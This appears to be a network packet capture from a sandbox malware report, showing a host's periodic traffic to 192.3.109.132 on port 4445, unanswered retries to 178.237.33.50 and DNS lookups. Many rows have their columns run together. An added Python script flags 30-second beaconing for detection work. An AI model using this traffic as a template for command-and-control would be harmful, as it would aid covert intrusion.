Mar 28, 2024 13:59:16.790441990 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790501118 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790508032 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.790611029 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790657043 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.790671110 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790777922 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790937901 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.790978909 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.791009903 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791106939 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.791203976 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791265965 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791313887 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.791321039 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791368008 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791433096 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791445017 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.791467905 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791520119 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.791603088 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791668892 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.791740894 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.792020082 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792231083 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792273998 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.792370081 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792464972 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792526960 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.792551041 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792629004 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792707920 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792707920 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.792793989 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792835951 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.792905092 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.792998075 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793143034 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793199062 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.793281078 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793358088 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793401957 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.793462992 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793567896 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793606043 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.793670893 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.793734074 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.793781042 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.794636965 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.794732094 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.794734955 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.794852018 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.794908047 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.794909954 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.795030117 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795089006 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795129061 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.795145988 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795243025 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795298100 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.795361996 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795413971 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.795423031 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795475960 CET    4445         49711      192.3.109.132  192.168.2.7
Mar 28, 2024 13:59:16.795527935 CET    49711        4445       192.168.2.7    192.3.109.132
Mar 28, 2024 13:59:16.795531034 CET    4445         49711      192.3.109.132  192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796142101 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796237946 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796245098 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796297073 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796351910 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796395063 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796405077 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796454906 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796457052 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796505928 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.796576977 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.870371103 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936052084 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936105967 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936117887 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936202049 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936219931 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936250925 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936305046 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936309099 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936319113 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936327934 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936377048 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936389923 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936403036 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936414003 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936417103 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936436892 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936456919 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936461926 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936479092 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936495066 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936497927 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936532021 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936611891 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936813116 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936866045 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936878920 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936903000 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936927080 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936942101 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936980963 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.936999083 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937000990 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937025070 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937045097 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937082052 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937537909 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937561035 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937581062 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937603951 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937642097 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.937642097 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938343048 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938371897 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938399076 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938412905 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938427925 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938462019 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938625097 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938637972 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938679934 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938698053 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938728094 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938761950 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938782930 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938795090 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938807011 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938853979 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938860893 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.938970089 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939173937 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939187050 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939203978 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939238071 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939245939 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939251900 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939273119 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939323902 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939327955 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939327955 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939336061 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939389944 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939719915 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939754963 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939773083 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939801931 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939817905 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939838886 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939847946 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939862013 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939914942 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.939982891 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940041065 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940092087 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940310955 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940356016 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940383911 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940397978 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940453053 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940453053 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940510988 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940543890 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940606117 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940607071 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940618992 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940633059 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940654993 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940675020 CET497114445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940680027 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:16.940718889 CET444549711192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.863133907 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:38.864408016 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:38.912237883 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286319017 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286426067 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286550999 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286900043 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286916971 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286942959 CET49731443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:39.286947966 CET4434973113.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397531033 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397578001 CET4434973313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397670984 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397762060 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397793055 CET4434973313.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.397846937 CET49733443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462028980 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462073088 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462148905 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462493896 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.462507963 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.769618034 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.769857883 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771321058 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771331072 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.771603107 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:40.772902012 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:40.820239067 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.032602072 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.033870935 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124510050 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124588013 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124655008 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124792099 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124809980 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124820948 CET49734443192.168.2.713.107.139.11
                                                                                                                                                                                        Mar 28, 2024 13:59:41.124825954 CET4434973413.107.139.11192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 13:59:41.247692108 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:11.045365095 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:11.048857927 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:00:11.264569998 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:41.068749905 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:00:41.069926023 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:00:41.280073881 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:05.998563051 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:06.591893911 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:07.591907978 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:09.388843060 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:11.129256964 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:11.130606890 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:01:11.344264030 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:13.091897964 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:20.189464092 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:34.404611111 CET4971280192.168.2.7178.237.33.50
                                                                                                                                                                                        Mar 28, 2024 14:01:41.205302954 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:01:41.208066940 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:01:41.411581993 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:11.518625975 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:11.520525932 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:02:11.734584093 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:41.585120916 CET444549708192.3.109.132192.168.2.7
                                                                                                                                                                                        Mar 28, 2024 14:02:41.586486101 CET497084445192.168.2.7192.3.109.132
                                                                                                                                                                                        Mar 28, 2024 14:02:41.801718950 CET444549708192.3.109.132192.168.2.7
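The conversation with 192.3.109.132 on port 4445 in the packet list above shows the server sending a packet roughly every 30 seconds and the client answering within milliseconds, while the port-80 packets to 178.237.33.50 after 14:01:05 have no replies at all and are spaced further and further apart. The following script is an added example (it is not part of the Joe Sandbox report) that turns such packet rows into a periodicity check of the kind a detection engineer would run over a flow log: it groups packets by conversation, collapses each exchange into one "burst", and flags conversations whose bursts recur with near-constant spacing. The sample rows are a subset of the table above written with "|" separators; the 1 s burst gap, the minimum of 4 bursts and the 5 % jitter ceiling are assumed thresholds, not values from the report.

```python
"""Periodicity check over rows of a sandbox TCP packet table.

Added example (not part of the Joe Sandbox report). Groups packets into
conversations, collapses each request/response exchange into one burst,
and flags conversations whose bursts recur at a near-constant interval.
The thresholds (1 s burst gap, 4 bursts minimum, 5 % jitter) are assumptions.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: a subset of the rows in the packet table above,
# written as "timestamp | src port | dst port | src IP | dst IP".
SAMPLE_ROWS = """\
Mar 28, 2024 13:59:41.032602072 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 13:59:41.033870935 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:00:11.045365095 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:00:11.048857927 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:00:41.068749905 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:00:41.069926023 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:01:05.998563051 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:06.591893911 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:07.591907978 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:09.388843060 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:11.129256964 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:01:11.130606890 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:01:13.091897964 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:20.189464092 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:34.404611111 CET | 49712 | 80 | 192.168.2.7 | 178.237.33.50
Mar 28, 2024 14:01:41.205302954 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:01:41.208066940 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:02:11.518625975 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:02:11.520525932 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
Mar 28, 2024 14:02:41.585120916 CET | 4445 | 49708 | 192.3.109.132 | 192.168.2.7
Mar 28, 2024 14:02:41.586486101 CET | 49708 | 4445 | 192.168.2.7 | 192.3.109.132
"""

# The report prints nanoseconds; datetime's %f accepts at most six digits.
TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{6})\d* CET$")


def parse_timestamp(text):
    m = TS_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    return datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S.%f")


def parse_rows(text):
    """Return (timestamp, src_ip, src_port, dst_ip, dst_port) tuples."""
    packets = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sport, dport, sip, dip = (c.strip() for c in line.split("|"))
        packets.append((parse_timestamp(ts), sip, int(sport), dip, int(dport)))
    return packets


def conversation_key(sip, sport, dip, dport):
    # Direction-agnostic, so both halves of an exchange land in one bucket.
    return tuple(sorted([(sip, sport), (dip, dport)]))


def burst_starts(times, gap=1.0):
    """Collapse packets closer than `gap` seconds into one burst."""
    starts, last = [], None
    for t in sorted(times):
        if last is None or (t - last).total_seconds() > gap:
            starts.append(t)
        last = t
    return starts


def find_beacons(packets, min_bursts=4, max_cv=0.05):
    """Flag conversations whose bursts recur with low relative jitter."""
    by_conv = defaultdict(list)
    for ts, sip, sport, dip, dport in packets:
        by_conv[conversation_key(sip, sport, dip, dport)].append(ts)
    findings = []
    for key, times in by_conv.items():
        starts = burst_starts(times)
        if len(starts) < min_bursts:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(starts, starts[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean  # coefficient of variation
        findings.append({
            "conversation": key,
            "bursts": len(starts),
            "mean_interval_s": round(mean, 2),
            "jitter_cv": round(cv, 4),
            "beacon": cv <= max_cv,
        })
    return findings


if __name__ == "__main__":
    for finding in find_beacons(parse_rows(SAMPLE_ROWS)):
        print(finding)
```

On the sample rows the 4445 conversation yields seven bursts about 30.1 s apart with a jitter well under 1 %, so it is flagged; the port-80 packets to 178.237.33.50 also produce several bursts, but their spacing grows roughly geometrically (about 1.6, 1.8, 3.7, 7.1 and 14.2 s), which is the signature of TCP retransmission backoff rather than a timer, and the high jitter keeps them unflagged. On a real flow log the same check should be run per conversation over a longer window, since a 30 s timer is only convincing after many repetitions.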
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2024 13:58:58.458333969 CET | 50110 | 53 | 192.168.2.7 | 1.1.1.1
Mar 28, 2024 13:58:59.342339039 CET | 58254 | 53 | 192.168.2.7 | 1.1.1.1
Mar 28, 2024 13:59:01.548681021 CET | 52542 | 53 | 192.168.2.7 | 1.1.1.1
Mar 28, 2024 13:59:03.433383942 CET | 63160 | 53 | 192.168.2.7 | 1.1.1.1
Mar 28, 2024 13:59:14.766247034 CET | 62960 | 53 | 192.168.2.7 | 1.1.1.1
